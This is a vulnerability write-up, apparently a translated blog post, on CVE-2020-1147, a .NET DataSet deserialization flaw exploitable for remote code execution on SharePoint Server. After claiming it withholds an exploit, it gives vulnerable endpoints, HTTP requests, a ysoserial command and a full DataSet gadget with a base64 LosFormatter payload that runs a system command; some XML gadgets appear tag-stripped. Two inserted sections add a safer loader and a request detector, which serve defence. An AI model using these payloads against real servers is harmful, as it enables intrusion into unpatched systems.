CVE-2020-1147 | .NET Framework, SharePoint Server and Visual Studio Remote Code Execution Vulnerability
A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserializing the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server that uses an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework, Microsoft SharePoint and Visual Studio validate the source markup of XML content. Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
When CVE-2020-1147 was released last week I was curious how this vulnerability manifested and how an attacker could achieve remote code execution with it. Since I'm somewhat familiar with SharePoint Server and .NET, I decided to take a look.
TL;DR
I share my breakdown of CVE-2020-1147, which was independently discovered by Oleksandr Mirosh, Markus Wulftange and Jonathan Birch. I will share details on how it can be leveraged against a SharePoint Server instance to gain remote code execution as a low privileged user. Please note: I am not providing a full exploit, so if that's what you're after, move along.
One of the things that stood out to me was that Microsoft referenced security guidance related to this bug. Quoting Microsoft:
If the incoming XML data contains an object whose type is not in this list, an exception is thrown. The deserialization operation fails. When loading XML into an existing DataSet or DataTable instance, the existing column definitions are also taken into account. If the table already contains a column definition of a custom type, that type is temporarily added to the allow list for the duration of the XML deserialization operation.
Interesting: types can be specified, and column definitions can be overridden. That was my main giveaway, so let's look at how DataSet objects are created.
Understanding the DataSet object
A DataSet contains a DataTable with DataColumn(s) and DataRow(s). More importantly, it implements the ISerializable interface, which means it can be serialized with XmlSerializer. Let's start by creating a DataTable:
using System.Data;
using System.Windows.Data;

static void Main(string[] args)
{
// instantiate the table
DataTable exptable = new DataTable("exp table");
// make a column and set type information and append to the table
DataColumn dc = new DataColumn("ObjectDataProviderCol");
dc.DataType = typeof(ObjectDataProvider);
exptable.Columns.Add(dc);
// make a row and set an object instance and append to the table
DataRow row = exptable.NewRow();
row["ObjectDataProviderCol"] = new ObjectDataProvider();
exptable.Rows.Add(row);
// dump the xml schema
exptable.WriteXmlSchema("c:/poc-schema.xml");
}
Using the WriteXmlSchema method, it's possible to write out the schema definition. That code produces the following:
<?xml version="1.0" standalone="yes"?>
<xs:schema id="NewDataSet" xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
  <xs:element name="NewDataSet" msdata:IsDataSet="true" msdata:MainDataTable="exp_x0020_table" msdata:UseCurrentLocale="true">
    <xs:complexType>
      <xs:choice minOccurs="0" maxOccurs="unbounded">
        <xs:element name="exp_x0020_table">
          <xs:complexType>
            <xs:sequence>
              <xs:element name="ObjectDataProviderCol" msdata:DataType="System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" type="xs:anyType" minOccurs="0" />
            </xs:sequence>
          </xs:complexType>
        </xs:element>
      </xs:choice>
    </xs:complexType>
  </xs:element>
</xs:schema>
After looking at the DataSet code, I found that it exposes its own serialization methods, WriteXml and ReadXml, which wrap XmlSerializer:
System.Data.DataSet.ReadXml(XmlReader reader, Boolean denyResolving)
System.Data.DataSet.ReadXmlDiffgram(XmlReader reader)
System.Data.XmlDataLoader.LoadData(XmlReader reader)
System.Data.XmlDataLoader.LoadTable(DataTable table, Boolean isNested)
System.Data.XmlDataLoader.LoadColumn(DataColumn column, Object[] foundColumns)
System.Data.DataColumn.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
System.Data.Common.ObjectStorage.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)
Now, all that's left to do is add the table to a DataSet and serialize it:
DataSet ds = new DataSet("poc");
ds.Tables.Add(exptable);
using (var writer = new StringWriter())
{
ds.WriteXml(writer);
Console.WriteLine(writer.ToString());
}
Those serialization methods preserve the schema types and use them at runtime to reconstruct the attacker-influenced types, with DataSet as the single expected type in the XmlSerializer object graph.
DataSet gadget
Below is an example of such a gadget that can be crafted. Note: do not confuse this with the DataSet gadget in ysoserial:
xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">minOccurs="0" maxOccurs="unbounded">name="Exp_x0020_Table">name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">Parsexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">cmd/c mspaint ]]>xsi:type="XamlReader"/>
This gadget chain will call an arbitrary static method on a Type that contains no interface members. Here I used the infamous XamlReader.Parse method to load malicious XAML that executes a system command. I used the ExpandedWrapper class to load two different types, as mentioned in @pwntester's amazing research.
This can be leveraged in many sinks, for example:
XmlSerializer ser = new XmlSerializer(typeof(DataSet));
Stream reader = new FileStream("c:/poc.xml", FileMode.Open);
ser.Deserialize(reader);
Many applications consider DataSet to be safe, so even when the expected type passed to XmlSerializer can't be controlled directly, a DataSet is typically somewhere in the object graph. The most interesting sink, however, is DataSet.ReadXml, which triggers code execution on its own:
DataSet ds = new DataSet();
ds.ReadXml("c:/poc.xml");
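The two points above, that the inline schema's msdata:DataType decides what XmlSerializer instantiates and that DataSet.ReadXml is the sink, also describe the shape of an application-side mitigation. The following is an added example, not code from the original post or from any Microsoft product: a loader that declares the expected columns itself, with primitive types only, and reads untrusted XML with XmlReadMode.IgnoreSchema, so an inline xs:schema in the input is skipped instead of being allowed to add typed columns. The dataset and column names, the Contoso.Hypothetical type name in the constructed input, and the assumption that this is used alongside the CVE-2020-1147 patch rather than instead of it are mine.

```csharp
// Added example, not from the original post: load DataSet XML from an untrusted source
// without letting that XML define column types.
using System;
using System.Data;
using System.IO;
using System.Xml;

public static class SafeDataSetLoader
{
    // The schema the application expects. Declaring it here, with primitive types only,
    // means the request cannot introduce a column of some other type. Names are hypothetical.
    public static DataSet BuildExpectedDataSet()
    {
        var ds = new DataSet("Suggestions");
        DataTable t = ds.Tables.Add("Contact");
        t.Columns.Add("PreferredName", typeof(string));
        t.Columns.Add("Weight", typeof(double));
        t.Columns.Add("SourceMask", typeof(int));
        return ds;
    }

    public static DataSet LoadUntrusted(string xml)
    {
        DataSet ds = BuildExpectedDataSet();
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,   // no DTDs, no entity expansion
            XmlResolver = null                        // never fetch external resources
        };
        using (XmlReader reader = XmlReader.Create(new StringReader(xml), settings))
        {
            // IgnoreSchema is documented to skip any inline schema and read data into the
            // existing schema only, discarding data that does not fit it. ReadSchema or Auto
            // would let the input add columns, including columns of arbitrary types.
            ds.ReadXml(reader, XmlReadMode.IgnoreSchema);
        }
        ds.AcceptChanges();
        return ds;
    }

    public static void Main()
    {
        // Constructed input: one valid row, plus an inline schema that tries to declare a
        // column of a non-primitive (hypothetical) type, and a value for that column.
        const string input = @"<Suggestions xmlns:xs=""http://www.w3.org/2001/XMLSchema"" xmlns:msdata=""urn:schemas-microsoft-com:xml-msdata"">
  <xs:schema id=""Suggestions"">
    <xs:element name=""Suggestions"" msdata:IsDataSet=""true"">
      <xs:complexType><xs:choice minOccurs=""0"" maxOccurs=""unbounded"">
        <xs:element name=""Contact""><xs:complexType><xs:sequence>
          <xs:element name=""PreferredName"" type=""xs:string"" minOccurs=""0""/>
          <xs:element name=""Injected"" msdata:DataType=""Contoso.Hypothetical.Widget, Contoso.Hypothetical"" type=""xs:anyType"" minOccurs=""0""/>
        </xs:sequence></xs:complexType></xs:element>
      </xs:choice></xs:complexType>
    </xs:element>
  </xs:schema>
  <Contact>
    <PreferredName>alice</PreferredName><Weight>1.5</Weight><SourceMask>3</SourceMask>
    <Injected>whatever</Injected>
  </Contact>
</Suggestions>";

        DataTable t = LoadUntrusted(input).Tables["Contact"];
        Console.WriteLine("columns: " + t.Columns.Count + ", rows: " + t.Rows.Count);
        Console.WriteLine("column 'Injected' present: " + t.Columns.Contains("Injected"));
        if (t.Rows.Count > 0)
        {
            Console.WriteLine("first row: " + t.Rows[0]["PreferredName"] + " / " + t.Rows[0]["SourceMask"]);
        }
    }
}
```

Built as a console program, the loader is meant to come back with the three declared columns and the one row, and without an Injected column: the schema the request carried was never consulted. The contrast with the post is the read mode, since ReadXml called without a mode (or with ReadSchema or Auto) is exactly what lets the input's schema, and its msdata:DataType values, shape the table.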
Applying the gadget to SharePoint Server
If we look at ZDI-20-874, the advisory mentions that the Microsoft.PerformancePoint.Scorecards.Client.ExcelDataSet control can be used for remote code execution. This immediately caught my interest because it has "DataSet" in its class name. Let's take a look at SharePoint's default web.config file:
<controls>
  <add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
  <add tagPrefix="SharePoint" namespace="Microsoft.SharePoint.WebControls" assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />
  <add tagPrefix="WebPartPages" namespace="Microsoft.SharePoint.WebPartPages" assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />
  <add tagPrefix="PWA" namespace="Microsoft.Office.Project.PWA.CommonControls" assembly="Microsoft.Office.Project.Server.PWA, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />
  <add tagPrefix="spsswc" namespace="Microsoft.Office.Server.Search.WebControls" assembly="Microsoft.Office.Server.Search, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" />
</controls>
Under the controls tag we can see that there is no prefix registered for the Microsoft.PerformancePoint.Scorecards namespace. However, if we check the SafeControl tags, every type in that namespace is indeed allowed:
<SafeControl Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" Namespace="Microsoft.PerformancePoint.Scorecards" TypeName="*" />
...
Now that we know we can instantiate classes from that namespace, let's dive into the code and inspect the ExcelDataSet type:
namespace Microsoft.PerformancePoint.Scorecards
{
[Serializable]
public class ExcelDataSet
{
The first thing I noticed was that it's serializable, so I knew it could actually be instantiated as a control, and that the default constructor would be called along with any public setter not marked with the System.Xml.Serialization.XmlIgnoreAttribute attribute. SharePoint uses XmlSerializer to create objects from controls, so this ExcelDataSet type can be leveraged anywhere attacker-supplied data can flow into TemplateControl.ParseControl.
One of the properties that stood out was DataTable, because it has a public setter and uses the type System.Data.DataTable. On closer inspection, however, we can see that the XmlIgnore attribute is in use, so deserialization can't be triggered through this setter.
[XmlIgnore]
public DataTable DataTable
{
get
{
if (this.dataTable == null && this.compressedDataTable != null)
{
this.dataTable = (Helper.GetObjectFromCompressedBase64String(this.compressedDataTable, ExcelDataSet.ExpectedSerializationTypes) as DataTable);
if (this.dataTable == null)
{
this.compressedDataTable = null;
}
}
return this.dataTable;
}
set
{
this.dataTable = value;
this.compressedDataTable = null;
}
}
The code above does reveal part of the answer, though: the getter calls GetObjectFromCompressedBase64String with the compressedDataTable property. That method base64-decodes the supplied string, decompresses the binary formatter payload and calls BinaryFormatter.Deserialize on it. However, the code passes a set of expected types for deserialization, one of which is DataTable, so we can't simply stuff a generated TypeConfuseDelegate in here.
private static readonly Type[] ExpectedSerializationTypes = new Type[]
{
typeof(DataTable),
typeof(Version)
};
Inspecting the CompressedDataTable property, we can see that setting the compressedDataTable member is no problem, since the property carries the System.Xml.Serialization.XmlElementAttribute attribute.
[XmlElement]
public string CompressedDataTable
{
get
{
if (this.compressedDataTable == null && this.dataTable != null)
{
this.compressedDataTable = Helper.GetCompressedBase64StringFromObject(this.dataTable);
}
return this.compressedDataTable;
}
set
{
this.compressedDataTable = value;
this.dataTable = null;
}
}
Putting it (almost) all together, I could register a prefix and instantiate the control with a base64-encoded, compressed and serialized (albeit dangerous) DataTable:
PUT /poc.aspx HTTP/1.1
Host:
Authorization:
Content-Length: 1688
However, I couldn't find a way to trigger the DataTable property getter. I knew I needed a way to use a DataSet; I just didn't know how.
Many roads lead to Rome
Stuck! After walking my dog I decided to think about the problem differently and asked myself what other sinks were available. Then I remembered that the DataSet.ReadXml sink was also a source of trouble, so I checked the code again and found this valid code path:
Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.GetDataSet()
Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.PopulateDataSetFromCache(DataSet)
Inside the ContactLinksSuggestionsMicroView class we can see the GetDataSet method:
protected override DataSet GetDataSet()
{
base.StopProcessingRequestIfNotNeeded();
if (!this.Page.IsPostBack || this.Hidden) // 1
{
return null;
}
DataSet dataSet = new DataSet();
DataTable dataTable = dataSet.Tables.Add();
dataTable.Columns.Add("PreferredName", typeof(string));
dataTable.Columns.Add("Weight", typeof(double));
dataTable.Columns.Add("UserID", typeof(string));
dataTable.Columns.Add("Email", typeof(string));
dataTable.Columns.Add("PageURL", typeof(string));
dataTable.Columns.Add("PictureURL", typeof(string));
dataTable.Columns.Add("Title", typeof(string));
dataTable.Columns.Add("Department", typeof(string));
dataTable.Columns.Add("SourceMask", typeof(int));
if (this.IsInitialPostBack) // 2
{
this.PopulateDataSetFromSuggestions(dataSet);
}
else
{
this.PopulateDataSetFromCache(dataSet); // 3
}
this.m_strJavascript.AppendLine("var user = new Object();");
foreach (object obj in dataSet.Tables[0].Rows)
{
DataRow dataRow = (DataRow)obj;
string scriptLiteralToEncode = (string)dataRow["UserID"];
int num = (int)dataRow["SourceMask"];
this.m_strJavascript.Append("user['");
this.m_strJavascript.Append(SPHttpUtility.EcmaScriptStringLiteralEncode(scriptLiteralToEncode));
this.m_strJavascript.Append("'] = ");
this.m_strJavascript.Append(num.ToString(CultureInfo.CurrentCulture));
this.m_strJavascript.AppendLine(";");
}
StringWriter stringWriter = new StringWriter(CultureInfo.CurrentCulture);
dataSet.WriteXml(stringWriter);
SPPageContentManager.RegisterHiddenField(this.Page, "__SUGGESTIONSCACHE__", stringWriter.ToString());
return dataSet;
}
At [1] the code checks that the request is a POST-back request. An attacker can satisfy this by setting the __viewstate POST variable. Then at [2] the code checks whether the __SUGGESTIONSCACHE__ POST variable is set; if it is, the IsInitialPostBack getter returns false. As long as this getter returns false, the attacker reaches [3] and PopulateDataSetFromCache. That call is made with a DataSet created from a specific schema definition.
protected void PopulateDataSetFromCache(DataSet ds)
{
string value = SPRequestParameterUtility.GetValue<string>(this.Page.Request, "__SUGGESTIONSCACHE__", SPRequestParameterSource.Form);
using (XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(value)))
{
xmlTextReader.DtdProcessing = DtdProcessing.Prohibit;
ds.ReadXml(xmlTextReader); // 4
ds.AcceptChanges();
}
}
Inside PopulateDataSetFromCache, the code calls SPRequestParameterUtility.GetValue to obtain attacker-controlled data from the __SUGGESTIONSCACHE__ request variable and parses it directly with ReadXml via an XmlTextReader. The previously defined schema is overridden by the schema supplied in the attacker's XML, and at [4] deserialization of untrusted types takes place, leading to remote code execution. To trigger this, I created a page that specifically uses the ContactLinksSuggestionsMicroView type:
PUT /poc.aspx HTTP/1.1
Host:
Authorization:
Content-Length: 252
If you are using this bug as a low privileged user and the AddAndCustomizePages setting is disabled, it can be exploited through a page that instantiates the InputFormContactLinksSuggestionsMicroView control, since that control extends ContactLinksSuggestionsMicroView:
namespace Microsoft.SharePoint.Portal.WebControls
{
[SharePointPermission(SecurityAction.Demand, ObjectModel = true)]
[AspNetHostingPermission(SecurityAction.LinkDemand, Level = AspNetHostingPermissionLevel.Minimal)]
[AspNetHostingPermission(SecurityAction.InheritanceDemand, Level = AspNetHostingPermissionLevel.Minimal)]
[SharePointPermission(SecurityAction.InheritanceDemand, ObjectModel = true)]
public class InputFormContactLinksSuggestionsMicroView : ContactLinksSuggestionsMicroView
{
I found a few endpoints that implement this control (but I haven't had time to test them). Update: Soroush Dalili tested them for me and confirmed that they are indeed exploitable.
/_layouts/15/quicklinks.aspx?Mode=Suggestion
/_layouts/15/quicklinksdialogform.aspx?Mode=Suggestion
Now, to exploit it, we can send a POST request to our new page:
POST /poc.aspx HTTP/1.1
Host:
Authorization:
Content-Type: application/x-www-form-urlencoded
Content-Length:
__viewstate=&__SUGGESTIONSCACHE__=
or
POST /quicklinks.aspx?Mode=Suggestion HTTP/1.1
Host:
Authorization:
Content-Type: application/x-www-form-urlencoded
Content-Length:
__viewstate=&__SUGGESTIONSCACHE__=
or
POST /quicklinksdialogform.aspx?Mode=Suggestion HTTP/1.1
Host:
Authorization:
Content-Type: application/x-www-form-urlencoded
Content-Length:
__viewstate=&__SUGGESTIONSCACHE__=
Note that each of these endpoints can also be CSRFed, so credentials aren't strictly required.
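The requests above all carry the attacker's DataSet XML in one form field, which makes the request body the natural place to detect this class of input before it reaches ReadXml. The following is an added example, not code from the original post or from SharePoint: a check that extracts the __SUGGESTIONSCACHE__ field from a form-encoded body and flags any msdata:DataType attribute whose type is not one of the primitive types a legitimate suggestions cache would use. The form bodies it runs on are constructed here, the Contoso.Hypothetical type name is a placeholder, and the primitive allow-list is my own choice, not the one in the .NET patch.

```csharp
// Added example, not from the original post: inspect a form-encoded request body for a
// DataSet XML payload whose inline schema declares a column of a non-primitive type.
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Xml;

public static class SuggestionsCacheInspector
{
    const string MsData = "urn:schemas-microsoft-com:xml-msdata";

    // Types a legitimate suggestions cache could carry. Anything else is reported. This
    // list is an assumption for the example, not the allow-list used by the .NET patch.
    static readonly HashSet<string> PrimitiveTypes = new HashSet<string>(StringComparer.Ordinal)
    {
        "System.String", "System.Int32", "System.Int64", "System.Double", "System.Decimal",
        "System.Boolean", "System.DateTime", "System.Guid", "System.Byte[]"
    };

    // Returns the decoded value of one form field, or null if the field is absent.
    public static string ExtractField(string formBody, string name)
    {
        foreach (string pair in formBody.Split('&'))
        {
            int eq = pair.IndexOf('=');
            string key = eq < 0 ? pair : pair.Substring(0, eq);
            if (WebUtility.UrlDecode(key) != name) continue;
            return eq < 0 ? "" : WebUtility.UrlDecode(pair.Substring(eq + 1));
        }
        return null;
    }

    // Returns every msdata:DataType value in the XML that names a non-primitive type.
    // Malformed XML is reported as well, since ReadXml would reject it anyway.
    public static List<string> FindCustomColumnTypes(string xml)
    {
        var found = new List<string>();
        var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };
        try
        {
            using (XmlReader reader = XmlReader.Create(new StringReader(xml), settings))
            {
                while (reader.Read())
                {
                    if (reader.NodeType != XmlNodeType.Element) continue;
                    string dataType = reader.GetAttribute("DataType", MsData);
                    if (dataType == null) continue;
                    // "System.String, mscorlib, Version=..." -> "System.String"; a generic
                    // instantiation such as ExpandedWrapper`2[[...]] never matches the list.
                    string typeName = dataType.Split(',')[0].Trim();
                    if (!PrimitiveTypes.Contains(typeName)) found.Add(dataType);
                }
            }
        }
        catch (XmlException ex)
        {
            found.Add("<malformed xml: " + ex.Message + ">");
        }
        return found;
    }

    public static bool IsSuspicious(string formBody)
    {
        string cache = ExtractField(formBody, "__SUGGESTIONSCACHE__");
        if (string.IsNullOrEmpty(cache)) return false;
        return FindCustomColumnTypes(cache).Count > 0;
    }

    // Constructed request body: a minimal DataSet with an inline schema whose single
    // column has the given msdata:DataType, URL-encoded into the form field.
    public static string BuildBody(string columnDataType)
    {
        string xml =
            "<NewDataSet xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:msdata=\"" + MsData + "\">" +
            "<xs:schema id=\"NewDataSet\"><xs:element name=\"Table1\"><xs:complexType><xs:sequence>" +
            "<xs:element name=\"UserID\" msdata:DataType=\"" + columnDataType + "\" type=\"xs:anyType\"/>" +
            "</xs:sequence></xs:complexType></xs:element></xs:schema>" +
            "<Table1><UserID>u1</UserID></Table1></NewDataSet>";
        return "__viewstate=&__SUGGESTIONSCACHE__=" + WebUtility.UrlEncode(xml);
    }

    public static void Main()
    {
        string benign = BuildBody("System.String");
        string custom = BuildBody("Contoso.Hypothetical.Widget, Contoso.Hypothetical");   // placeholder type
        Console.WriteLine("benign body flagged: " + IsSuspicious(benign));
        Console.WriteLine("custom-type body flagged: " + IsSuspicious(custom));
        foreach (string t in FindCustomColumnTypes(ExtractField(custom, "__SUGGESTIONSCACHE__")))
            Console.WriteLine("  reported type: " + t);
    }
}
```

The same walk over msdata:DataType attributes works for the ContactLinksSuggestionsMicroView endpoints and for any other ReadXml sink fed from a request, since the element that carries the type name is the only thing the check looks at. It is a detection aid, not a substitute for the patch: the patched framework applies its own type allow-list inside ReadXml, which this check does not replicate.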
One last thing
You can't use the XamlReader.Load static method, because the IIS web server impersonates the IUSR account, which has limited access to the registry. If you try, you'll end up with a stack trace like the one below, unless impersonation has been disabled under IIS and the application pool identity is used:
{System.InvalidOperationException: There is an error in the XML document. ---> System.TypeInitializationException: The type initializer for 'MS.Utility.EventTrace' threw an exception. ---> System.Security.SecurityException: Requested registry access is not allowed.
at System.ThrowHelper.ThrowSecurityException(ExceptionResource resource)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name, Boolean writable)
at Microsoft.Win32.RegistryKey.OpenSubKey(String name)
at Microsoft.Win32.Registry.GetValue(String keyName, String valueName, Object defaultValue)
at MS.Utility.EventTrace.IsClassicETWRegistryEnabled()
at MS.Utility.EventTrace..cctor()
--- End of inner exception stack trace ---
at MS.Utility.EventTrace.EasyTraceEvent(Keyword keywords, Event eventID, Object param1)
at System.Windows.Markup.XamlReader.Load(XmlReader reader, ParserContext parserContext, XamlParseMode parseMode, Boolean useRestrictiveXamlReader, List`1 safeTypes)
at System.Windows.Markup.XamlReader.Load(XmlReader reader, ParserContext parserContext, XamlParseMode parseMode, Boolean useRestrictiveXamlReader)
at System.Windows.Markup.XamlReader.Load(XmlReader reader, ParserContext parserContext, XamlParseMode parseMode)
at System.Windows.Markup.XamlReader.Load(XmlReader reader)
at System.Windows.Markup.XamlReader.Parse(String xamlText)
--- End of inner exception stack trace ---
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader, String encodingStyle, XmlDeserializationEvents events)
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader, String encodingStyle)
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)
at System.Data.Common.ObjectStorage.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
at System.Data.DataColumn.ConvertXmlToObject(XmlReader xmlReader, XmlRootAttribute xmlAttrib)
at System.Data.XmlDataLoader.LoadColumn(DataColumn column, Object[] foundColumns)
at System.Data.XmlDataLoader.LoadTable(DataTable table, Boolean isNested)
at System.Data.XmlDataLoader.LoadData(XmlReader reader)
at System.Data.DataSet.ReadXmlDiffgram(XmlReader reader)
at System.Data.DataSet.ReadXml(XmlReader reader, Boolean denyResolving)
at System.Data.DataSet.ReadXml(XmlReader reader)
at Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.PopulateDataSetFromCache(DataSet ds)
at Microsoft.SharePoint.Portal.WebControls.ContactLinksSuggestionsMicroView.GetDataSet()
at Microsoft.SharePoint.Portal.WebControls.PrivacyItemView.GetQueryResults(Object obj)
You'll need to find another dangerous static method or setter to call from a type that doesn't use interface members. I leave that as an exercise for the reader; good luck!
Remote code execution
OK, I lied. The truth is, I just want people to read the full blog post instead of racing to the exploit payload, so that they better understand the underlying technology, you know? Anyway, to exploit this bug we can (ab)use the LosFormatter.Deserialize method, since that class contains no interface members. For that, we need to generate a base64 payload of a serialized ObjectStateFormatter gadget chain:
c:\> ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c mspaint
Now we can insert the payload into the following DataSet gadget and trigger remote code execution against the target SharePoint Server!
xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">minOccurs="0" maxOccurs="unbounded">name="Exp_x0020_Table">name="pwn" msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/>
xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted">xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">Deserializexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">/wEykwcAAQAAAP8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAC1BTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBtc3BhaW50IiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgs=xsi:type="LosFormatter">
[Figure: gaining code execution against the IIS process]
Conclusion
Microsoft rated this vulnerability with an exploitability index of 1, and we agree, meaning you should patch it immediately if you haven't already. It's worth mentioning that this gadget chain can be used against multiple applications built with .NET, so even if you don't have SharePoint Server installed, you're still affected by this bug.
References
https://speakerdeck.com/pwntester/attacking-net-serialization
https://docs.microsoft.com/zh-cn/dotnet/framework/data/adonet/dataset-datatable-dataview/security-guidance
https://www.zerodayinitiative.com/advisories/ZDI-20-874/